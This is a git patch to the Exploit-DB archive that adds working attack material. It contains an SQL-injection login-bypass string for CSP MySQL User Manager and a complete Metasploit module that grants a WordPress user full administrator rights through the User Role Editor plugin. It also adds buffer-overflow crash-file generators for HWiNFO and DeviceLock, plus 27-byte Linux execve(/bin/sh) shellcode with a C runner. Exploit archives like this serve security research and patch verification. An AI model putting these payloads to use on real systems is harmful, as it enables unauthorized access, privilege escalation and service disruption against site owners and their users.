From a066ef921258f6e5ec2043a528a5c92cb91c2de3 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Mon, 7 May 2018 05:01:44 +0000
Subject: [PATCH] DB: 2018-05-07

11 changes to exploits/shellcodes

HWiNFO 5.82-3410 - Denial of Service

DeviceLock Plug and Play Auditor 5.72 - Unicode Buffer Overflow (SEH)
CSP MySQL User Manager 2.3.1 - Authentication Bypass
WordPress Plugin User Role Editor < 4.25 - Privilege Escalation

Linux/x86 - execve(/bin/sh) NOT Encoded Shellcode (27 bytes)
---
 exploits/linux/webapps/44589.txt |  41 ++++++++
 exploits/php/webapps/40804.txt   |   4 +-
 exploits/php/webapps/40971.txt   |   4 +-
 exploits/php/webapps/41919.txt   |   4 +-
 exploits/php/webapps/41920.txt   |   4 +-
 exploits/php/webapps/41921.txt   |   4 +-
 exploits/php/webapps/41922.txt   |   4 +-
 exploits/php/webapps/44595.rb    | 174 +++++++++++++++++++++++++++++++
 exploits/windows/dos/44593.py    |  39 +++++++
 exploits/windows/local/44590.txt |  85 +++++++++++++++
 files_exploits.csv               |   4 +
 files_shellcodes.csv             |   1 +
 shellcodes/linux_x86/44594.c     |  45 ++++++++
 13 files changed, 401 insertions(+), 12 deletions(-)
 create mode 100644 exploits/linux/webapps/44589.txt
 create mode 100755 exploits/php/webapps/44595.rb
 create mode 100755 exploits/windows/dos/44593.py
 create mode 100644 exploits/windows/local/44590.txt
 create mode 100644 shellcodes/linux_x86/44594.c

diff --git a/exploits/linux/webapps/44589.txt b/exploits/linux/webapps/44589.txt
new file mode 100644
index 000000000..b010d8fbf
--- /dev/null
+++ b/exploits/linux/webapps/44589.txt
@@ -0,0 +1,41 @@
+# Exploit Title: CSP MySQL User Manager 2.3.1 - Authentication Bypass
+# Date: 2018-05-04
+# Exploit Author: Youssef mami
+# Vendor Homepage: https://code.google.com/archive/p/cspmum/
+# Software Link: https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/cspmum/cmum-231.zip
+# Version: 2.3.1
+# Tested on: Linux 2.6.38-11
+# CVE : CVE-2018-10757
+
+##################################################################################
+.__                                                  __   
+|  |__ _____    _____   _____ _____    _____   _____/  |_ 
+|  |  \\__  \  /     \ /     \\__  \  /     \_/ __ \   __\
+|   Y  \/ __ \|  Y Y  \  Y Y  \/ __ \|  Y Y  \  ___/|  |  
+|___|  (____  /__|_|  /__|_|  (____  /__|_|  /\___  >__|  
+     \/     \/      \/      \/     \/      \/     \/      
+.__        _____                            __  .__                      
+|__| _____/ ____\___________  _____ _____ _/  |_|__| ________ __   ____  
+|  |/    \   __\/  _ \_  __ \/     \\__  \\   __\  |/ ____/  |  \_/ __ \ 
+|  |   |  \  | (  <_> )  | \/  Y Y  \/ __ \|  | |  < <_|  |  |  /\  ___/ 
+|__|___|  /__|  \____/|__|  |__|_|  (____  /__| |__|\__   |____/  \___  >
+        \/                        \/     \/            |__|           \/ 
+                          .__                     
+  ______ ______________  _|__| ____  ____   ______
+ /  ___// __ \_  __ \  \/ /  |/ ___\/ __ \ /  ___/
+ \___ \\  ___/|  | \/\   /|  \  \__\  ___/ \___ \ 
+/____  >\___  >__|    \_/ |__|\___  >___  >____  >
+     \/     \/                    \/    \/     \/ 
+
+                                                                                                                                         
+##################################################################################                                
+SQL Injection Authentication Bypass
+Product Page: https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/cspmum/cmum-231.zip
+ 
+Author(Pentester): Youssef mami (contact@hammamet-services.com)
+On Web: www.hammamet-services.com and http://hiservices.blogspot.com ( our blog )
+On Social: www.facebook.com/hammamet.informatique and https://twitter.com/hammamet_info
+##################################################################################
+we just need to input admin login like this : admin' or ' 1=1-- and any password :-) 
+login : admin' or ' 1=1--
+password: hammamet informatique services
\ No newline at end of file
diff --git a/exploits/php/webapps/40804.txt b/exploits/php/webapps/40804.txt
index 4efd18793..60a4e4bbd 100644
--- a/exploits/php/webapps/40804.txt
+++ b/exploits/php/webapps/40804.txt
@@ -3,8 +3,8 @@
 # Exploit Author: TAD GROUP
 # Vendor Homepage: https://wordpress.org/plugins/olimometer/
 # Software Link: https://wordpress.org/plugins/olimometer/
-# Contact: info@tad.bg
-# Website: http://tad.bg <https://tad.bg/en/>
+# Contact: info@tad.group
+# Website: https://tad.group
 # Category: Web Application Exploits
 # Tested on: Debian 8
 
diff --git a/exploits/php/webapps/40971.txt b/exploits/php/webapps/40971.txt
index cc463abef..f8384c378 100644
--- a/exploits/php/webapps/40971.txt
+++ b/exploits/php/webapps/40971.txt
@@ -3,8 +3,8 @@
 # Exploit Author: TAD GROUP
 # Vendor Homepage: https://wordpress.org/plugins/simply-poll/
 # Software Link: https://wordpress.org/plugins/simply-poll/
-# Contact: info@tad.bg
-# Website: http://tad.bg <http://tad.bg/>
+# Contact: info@tad.group
+# Website: https://tad.group
 # Category: Web Application Exploits
 
 1 - Description
diff --git a/exploits/php/webapps/41919.txt b/exploits/php/webapps/41919.txt
index 0e8b0e22e..885d7784f 100644
--- a/exploits/php/webapps/41919.txt
+++ b/exploits/php/webapps/41919.txt
@@ -4,8 +4,8 @@
 # Vendor Homepage: https://wordpress.org/plugins-wp/kittycatfish/
 # Software Link: https://wordpress.org/plugins-wp/kittycatfish/
 # Version: 2.2
-# Contact: info@tad.bg
-# Website: https://tad.bg <https://tad.bg>
+# Contact: info@tad.group
+# Website: https://tad.group
 # Category: Web Application Exploits
 
 
diff --git a/exploits/php/webapps/41920.txt b/exploits/php/webapps/41920.txt
index ef6a46f09..6c1690908 100644
--- a/exploits/php/webapps/41920.txt
+++ b/exploits/php/webapps/41920.txt
@@ -4,8 +4,8 @@
 # Vendor Homepage: https://www.bestsoftinc.com/
 # Software Link: https://www.bestsoftinc.com/car-rental-system.html
 # Version: 2.5
-# Contact: info@tad.bg
-# Website: https://tad.bg <https://tad.bg>
+# Contact: info@tad.group
+# Website: https://tad.group
 # Category: Web Application Exploits
 
 1. Description
diff --git a/exploits/php/webapps/41921.txt b/exploits/php/webapps/41921.txt
index 4883b51eb..f63dfe57f 100644
--- a/exploits/php/webapps/41921.txt
+++ b/exploits/php/webapps/41921.txt
@@ -4,8 +4,8 @@
 # Vendor Homepage: http://wow-company.com/
 # Software Link: https://wordpress.org/plugins/mwp-viral-signup/
 # Version: 2.1
-# Contact: info@tad.bg
-# Website: https://tad.bg <https://tad.bg>
+# Contact: info@tad.group
+# Website: https://tad.group
 # Category: Web Application Exploits
 
 1. Description
diff --git a/exploits/php/webapps/41922.txt b/exploits/php/webapps/41922.txt
index 29656062c..674badc48 100644
--- a/exploits/php/webapps/41922.txt
+++ b/exploits/php/webapps/41922.txt
@@ -4,8 +4,8 @@
 # Vendor Homepage: http://wow-company.com/
 # Software Link: https://wordpress.org/plugins/mwp-forms/
 # Version: 2.1
-# Contact: info@tad.bg
-# Website: https://tad.bg <https://tad.bg>
+# Contact: info@tad.group
+# Website: https://tad.group
 # Category: Web Application Exploits
 
 1. Description
diff --git a/exploits/php/webapps/44595.rb b/exploits/php/webapps/44595.rb
new file mode 100755
index 000000000..84dae8d91
--- /dev/null
+++ b/exploits/php/webapps/44595.rb
@@ -0,0 +1,174 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HTTP::Wordpress
+
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name'            => 'WordPress User Role Editor Plugin Privilege Escalation',
+      'Description'     => %q{
+        The WordPress User Role Editor plugin prior to v4.25, is lacking an authorization
+        check within its update user profile functionality ("update" function, contained
+        within the "class-user-other-roles.php" module).
+        Instead of verifying whether the current user has the right to edit other users'
+        profiles ("edit_users" WP capability), the vulnerable function verifies whether the
+        current user has the rights to edit the user ("edit_user" WP function) specified by
+        the supplied user id ("user_id" variable/HTTP POST parameter). Since the supplied
+        user id is the current user's id, this check is always bypassed (i.e. the current
+        user is always allowed to modify its profile).
+        This vulnerability allows an authenticated user to add arbitrary User Role Editor
+        roles to its profile, by specifying them via the "ure_other_roles" parameter within
+        the HTTP POST request to the "profile.php" module (issued when "Update Profile" is
+        clicked).
+        By default, this module grants the specified WP user all administrative privileges,
+        existing within the context of the User Role Editor plugin.
+      },
+      'Author'          =>
+        [
+          'ethicalhack3r',    # Vulnerability discovery
+          'Tomislav Paskalev' # Exploit development, metasploit module
+        ],
+      'License'         => MSF_LICENSE,
+      'References'      =>
+        [
+          ['WPVDB', '8432'],
+          ['URL', 'https://www.wordfence.com/blog/2016/04/user-role-editor-vulnerability/']
+	],
+      'DisclosureDate'  => 'Apr 05 2016',
+    ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI',   [true, 'URI path to WordPress', '/']),
+        OptString.new('ADMINPATH',   [true, 'wp-admin directory', 'wp-admin/']),
+        OptString.new('CONTENTPATH', [true, 'wp-content directory', 'wp-content/']),
+        OptString.new('PLUGINSPATH', [true, 'wp plugins directory', 'plugins/']),
+        OptString.new('PLUGINPATH',  [true, 'User Role Editor directory', 'user-role-editor/']),
+        OptString.new('USERNAME',    [true, 'WordPress username']),
+        OptString.new('PASSWORD',    [true, 'WordPress password']),
+	OptString.new('PRIVILEGES',  [true, 'Desired User Role Editor privileges', 'activate_plugins,delete_others_pages,delete_others_posts,delete_pages,delete_posts,delete_private_pages,delete_private_posts,delete_published_pages,delete_published_posts,edit_dashboard,edit_others_pages,edit_others_posts,edit_pages,edit_posts,edit_private_pages,edit_private_posts,edit_published_pages,edit_published_posts,edit_theme_options,export,import,list_users,manage_categories,manage_links,manage_options,moderate_comments,promote_users,publish_pages,publish_posts,read_private_pages,read_private_posts,read,remove_users,switch_themes,upload_files,customize,delete_site,create_users,delete_plugins,delete_themes,delete_users,edit_plugins,edit_themes,edit_users,install_plugins,install_themes,unfiltered_html,unfiltered_upload,update_core,update_plugins,update_themes,ure_create_capabilities,ure_create_roles,ure_delete_capabilities,ure_delete_roles,ure_edit_roles,ure_manage_options,ure_reset_roles'])
+      ])
+  end
+
+  # Detect the vulnerable plugin by enumerating its readme.txt file
+  def check
+    readmes = ['readme.txt', 'Readme.txt', 'README.txt']
+
+    res = nil
+    readmes.each do |readme_name|
+      readme_url = normalize_uri(target_uri.path, datastore['CONTENTPATH'], datastore['PLUGINSPATH'], datastore['PLUGINPATH'], readme_name)
+      vprint_status("Checking #{readme_url}")
+      res = send_request_cgi(
+        'uri'    => readme_url,
+        'method' => 'GET'
+      )
+      break if res && res.code == 200
+    end
+
+    if res.nil? || res.code != 200
+      # The readme.txt file does not exist
+      return Msf::Exploit::CheckCode::Unknown
+    end
+
+    version_res = extract_and_check_version(res.body.to_s, :readme, 'plugin', '4.25', nil)
+    return version_res
+  end
+
+  def username
+    datastore['USERNAME']
+  end
+
+  def password
+    datastore['PASSWORD']
+  end
+
+  # Search for specified data within the provided HTTP response
+  def check_response(res, name, regex)
+    res.body =~ regex
+    result = $1
+    if result
+      print_good("#{peer} - WordPress - Getting data   - #{name}")
+    else
+      vprint_error("#{peer} #{res.body}")
+      fail_with("#{peer} - WordPress - Getting data   - Failed (#{name})")
+    end
+    return result
+  end
+
+  # Run the exploit
+  def run
+    # Check if the specified target is running WordPress
+    fail_with("#{peer} - WordPress - Not Found") unless wordpress_and_online?
+
+    # Authenticate to WordPress
+    print_status("#{peer} - WordPress - Authentication - #{username}:#{password}")
+    cookie = wordpress_login(username, password)
+    fail_with("#{peer} - WordPress - Authentication - Failed") if cookie.nil?
+    store_valid_credential(user: username, private: password, proof: cookie)
+    print_good("#{peer} - WordPress - Authentication - OK")
+
+    # Get additional information from WordPress, required for the HTTP POST request (anti-CSRF tokens, user parameters)
+    url = normalize_uri(wordpress_url_backend, 'profile.php')
+    print_status("#{peer} - WordPress - Getting data   - #{url}")
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => url,
+      'cookie'   => cookie
+    })
+
+    if res and res.code == 200
+      wp_nonce     = check_response(res, "_wpnonce",     /name=\"_wpnonce\" value=\"(.+?(?=\"))\"/)
+      color_nonce  = check_response(res, "color-nonce",  /name=\"color-nonce\" value=\"(.+?(?=\"))\"/)
+      checkuser_id = check_response(res, "checkuser_id", /name=\"checkuser_id\" value=\"(.+?(?=\"))\"/)
+      nickname     = check_response(res, "nickname",     /name=\"nickname\" id=\"nickname\" value=\"(.+?(?=\"))\"/)
+      display_name = check_response(res, "display_name", /name=\"display_name\" id=\"display_name\"\>[\s]+\<option  selected=\'selected\'\>(.+?(?=\<))\</)
+      email        = check_response(res, "email",        /name=\"email\" id=\"email\" value=\"(.+?(?=\"))\"/)
+      user_id      = check_response(res, "user_id",      /name=\"user_id\" id=\"user_id\" value=\"(.+?(?=\"))\"/)
+    else
+      fail_with("#{peer} - WordPress - Getting data   - Server response (code #{res.code})")
+    end
+ 
+    # Send HTTP POST request - update the specified user's privileges
+    print_status("#{peer} - WordPress - Changing privs - #{username}")
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => url,
+      'vars_post' => {
+        '_wpnonce'         => wp_nonce,
+        '_wp_http_referer' => URI::encode(url),
+        'from'             => 'profile',
+        'checkuser_id'     => checkuser_id,
+        'color-nonce'      => color_nonce,
+        'admin_color'      => 'fresh',
+        'admin_bar_front'  => '1',
+        'first_name'       => '',
+        'last_name'        => '',
+        'nickname'         => nickname,
+        'display_name'     => display_name,
+        'email'            => email,
+        'url'              => '',
+        'description'      => '',
+        'pass1'            => '',
+        'pass2'            => '',
+        'ure_other_roles'  => datastore['PRIVILEGES'],
+        'action'           => 'update',
+        'user_id'          => user_id,
+        'submit'           => 'Update+Profile'
+      },
+      'cookie'    => cookie
+    })
+
+    # check outcome
+    if res and res.code == 302
+      print_good("#{peer} - WordPress - Changing privs - OK")
+    else
+      fail_with("#{peer} - WordPress - Changing privs - Server response (code #{res.code})")
+    end
+  end
+end
+
+# EoF
\ No newline at end of file
diff --git a/exploits/windows/dos/44593.py b/exploits/windows/dos/44593.py
new file mode 100755
index 000000000..4f62bcfcb
--- /dev/null
+++ b/exploits/windows/dos/44593.py
@@ -0,0 +1,39 @@
+#!/usr/bin/python
+#
+# Exploit Author: bzyo
+# Twitter: @bzyo_
+# Exploit Title: HWiNFO 5.82-3410 - Denial of Service
+# Date: 05-04-18
+# Vulnerable Software: HWiNFO 5.82-3410
+# Vendor Homepage: https://www.hwinfo.com/
+# Version: 5.82-3410
+# Software Link: https://www.hwinfo.com/files/hwi_582.exe
+# Tested On: Windows 7 x86
+#
+# PoC: 
+# 1. generate hwinfo.txt, copy contents to clipboard
+# 2. open app, select Report, Create
+# 3. choose Export format XML
+# 4. paste hwinfo.txt contents into filename field
+# 5. select Next, Next
+#
+# app crashes & EIP overwrite;
+# !mona seh > only ppr, non-safeseh module contains startnull
+# 0x00400000 | 0x00d8b000 | 0x0098b000 | 5.82-3410 [HWiNFO32.EXE] (C:\Program Files\HWiNFO32\HWiNFO32.EXE)
+#
+
+filename="hwinfo.txt"
+#offset 530
+junk = "A"*526
+
+seh = "B"*4
+
+nseh = "C"*4
+
+fill = "D"*9465
+
+buffer = junk + seh + nseh + fill
+
+textfile = open(filename , 'w')
+textfile.write(buffer)
+textfile.close()
\ No newline at end of file
diff --git a/exploits/windows/local/44590.txt b/exploits/windows/local/44590.txt
new file mode 100644
index 000000000..771033bad
--- /dev/null
+++ b/exploits/windows/local/44590.txt
@@ -0,0 +1,85 @@
+# Exploit Title: DeviceLock Plug and Play Auditor 5.72 - Unicode Buffer Overflow (SEH)
+# Date: 2018-05-04
+# Exploit Author: Youssef mami
+# Vendor Homepage: https://www.devicelock.com/freeware.html/
+# Version: 5.72
+# CVE : CVE-2018-10655
+
+# Security Issue:
+
+DeviceLock Plug and Play Auditor "DLPnpAuditor.exe" is vulnerable to a Unicode type of buffer overflow, when supplied a specially crafted textfile using the "scan network" from file option.
+The buffer overload payload will get converted to unicode character encoding. Unicode support is used by applications for internationalization purposes allowing a consistent way to visually
+represent different character sets on most systems around the world. 
+
+e.g.
+
+Before our buffer overflow payload was put on the stack it was expanded with 0x00 so "RRRR" transforms to Unicode representation of "00520052"
+(52 is HEX for Ascii char R) containing 0's (NULL) values. Therefore, attempting to exploit the vulnerable program needs an unicode compatiable address
+(address with null bytes) and using encoding methods like "alpha2" encoder tool.
+
+Stack dump:
+
+SEH chain of main thread
+Address    SE handler
+0018EE00   ntdll.771B34DD
+0018FBD4   00520052
+00520052   A42F0000
+E5C1411F   *** CORRUPT ENTRY ***
+
+EAX 00000000
+ECX 00520052
+EDX 771B34DD ntdll.771B34DD
+EBX 00000000
+ESP 0018EDEC
+EBP 0018EE0C
+ESI 00000000
+EDI 00000000
+EIP 00520052
+C 0  ES 002B 32bit 0(FFFFFFFF)
+P 1  CS 0023 32bit 0(FFFFFFFF)
+A 0  SS 002B 32bit 0(FFFFFFFF)
+Z 1  DS 002B 32bit 0(FFFFFFFF)
+S 0  FS 0053 32bit 7EFDD000(FFF)
+T 0  GS 002B 32bit 0(FFFFFFFF)
+D 0
+O 0  LastErr ERROR_SUCCESS (00000000)
+EFL 00210246 (NO,NB,E,BE,NS,PE,GE,LE)
+ST0 empty g
+ST1 empty g
+ST2 empty g
+ST3 empty g
+ST4 empty g
+ST5 empty g
+ST6 empty g
+ST7 empty g
+               3 2 1 0      E S P U O Z D I
+FST 4020  Cond 1 0 0 0  Err 0 0 1 0 0 0 0 0  (EQ)
+FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1
+
+
+
+# Exploit/POC:
+
+1) Create POC textfile
+2) Under File menu "Scan Network" choose "From file" under drop down menu.
+3) Choose the exploit file select the Scan "Domain" box and run it.
+
+#Unicode SEH Buffer Overflow
+#https://www.devicelock.com/download/
+
+PAYLOAD="A"*1036+"R"*8+"B"*56      #Control SEH
+file=open("devicelock-bof.txt","w")
+file.write(PAYLOAD)
+file.close()
+
+print 'DeviceLock Plug and Play Auditor v5.72 (freeware)'
+print 'Exploit POC file created.'
+print 'hyp3rlinx'
+
+
+# Disclosure Timeline:
+Vendor Notification:  April 17, 2018
+No reply
+Vendor Notification: April 22, 2018
+No reply
+May 6, 2018 : Public Disclosure
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 589697960..675b21eab 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -5965,6 +5965,7 @@ id,file,description,date,author,type,platform,port
 44566,exploits/multiple/dos/44566.html,"WebKit - 'WebCore::jsElementScrollHeightGetter' Use-After-Free",2018-05-02,"Google Security Research",dos,multiple,
 44572,exploits/windows/dos/44572.txt,"Schneider Electric InduSoft Web Studio and InTouch Machine Edition - Denial of Service",2018-05-02,"Tenable NS",dos,windows,
 44579,exploits/linux/dos/44579.c,"Linux Kernel  < 4.17-rc1 - 'AF_LLC' Double Free",2018-04-30,SecuriTeam,dos,linux,
+44593,exploits/windows/dos/44593.py,"HWiNFO 5.82-3410 - Denial of Service",2018-05-06,bzyo,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -9701,6 +9702,7 @@ id,file,description,date,author,type,platform,port
 44573,exploits/windows/local/44573.txt,"Adobe Reader PDF - Client Side Request Injection",2018-05-02,"Alex Inführ",local,windows,
 44581,exploits/windows/local/44581.c,"Windows - Local Privilege Escalation",2018-04-24,XPN,local,windows,
 44586,exploits/windows_x86-64/local/44586.rb,"Windows WMI - Recieve Notification Exploit (Metasploit)",2018-05-04,Metasploit,local,windows_x86-64,
+44590,exploits/windows/local/44590.txt,"DeviceLock Plug and Play Auditor 5.72 - Unicode Buffer Overflow (SEH)",2018-05-06,hyp3rlinx,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -39280,3 +39282,5 @@ id,file,description,date,author,type,platform,port
 44583,exploits/multiple/webapps/44583.txt,"Apache Struts2 2.0.0 < 2.3.15 - Prefixed Parameters OGNL Injection",2014-01-14,"Takeshi Terada",webapps,multiple,
 44585,exploits/php/webapps/44585.txt,"WordPress Plugin WF Cookie Consent 1.1.3 - Cross-Site Scripting",2018-05-04,B0UG,webapps,php,
 44587,exploits/php/webapps/44587.txt,"IceWarp Mail Server < 11.1.1 - Directory Traversal",2018-05-04,"Trustwave's SpiderLabs",webapps,php,
+44589,exploits/linux/webapps/44589.txt,"CSP MySQL User Manager 2.3.1 - Authentication Bypass",2018-05-06,"Youssef Mami",webapps,linux,
+44595,exploits/php/webapps/44595.rb,"WordPress Plugin User Role Editor < 4.25 - Privilege Escalation",2018-05-06,"Tomislav Paskalev",webapps,php,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index db4139510..3b46caa62 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -880,3 +880,4 @@ id,file,description,date,author,type,platform
 44509,shellcodes/linux_x86/44509.c,"Linux/x86 - chmod 4755 /bin/dash Shellcode (33 bytes)",2018-04-24,absolomb,shellcode,linux_x86
 44510,shellcodes/linux_x86/44510.c,"Linux/x86 - execve(cp /bin/sh /tmp/sh; chmod +s /tmp/sh) + Null-Free Shellcode (74 bytes)",2018-04-24,absolomb,shellcode,linux_x86
 44517,shellcodes/linux_x86/44517.c,"Linux/x86 - execve(/bin/sh) + ROT-13 + RShift-2 + XOR Encoded Shellcode (44 bytes)",2018-04-24,"Nuno Freitas",shellcode,linux_x86
+44594,shellcodes/linux_x86/44594.c,"Linux/x86 - execve(/bin/sh) NOT Encoded Shellcode (27 bytes)",2018-05-06,"Nuno Freitas",shellcode,linux_x86
diff --git a/shellcodes/linux_x86/44594.c b/shellcodes/linux_x86/44594.c
new file mode 100644
index 000000000..b342604b1
--- /dev/null
+++ b/shellcodes/linux_x86/44594.c
@@ -0,0 +1,45 @@
+/*
+; Title     : Execve /bin/sh Shellcode encoded with NOT
+; Date      : May, 2018
+; Author    : Nuno Freitas
+; Twitter   : @nunof11
+; SLAE ID   : SLAE-1112
+; Size      : 27 bytes
+; Tested on : i686 GNU/Linux
+
+section .text
+
+global _start
+
+_start:
+        xor ecx, ecx
+	mul ecx
+        push ecx
+
+	; instructions to avoid having the strings "nib/" and "hs//" pushed directly
+	mov edi, 0x978CD0D0
+	mov esi, 0x91969DD0
+	not edi
+	not esi
+
+	push edi
+	push esi
+
+        mov ebx, esp
+        mov al, 0xb
+        int 0x80
+*/
+
+#include <stdio.h>
+#include <string.h>
+
+unsigned char shellcode[] = \
+"\x31\xc9\xf7\xe1\x51\xbf\xd0\xd0\x8c\x97\xbe\xd0\x9d\x96\x91\xf7\xd7\xf7\xd6\x57\x56\x89\xe3\xb0\x0b\xcd\x80";
+
+void main()
+{
+	printf("Shellcode Length:  %d\n", strlen(shellcode));
+
+	int (*ret)() = (int(*)())shellcode;
+	ret();
+}
\ No newline at end of file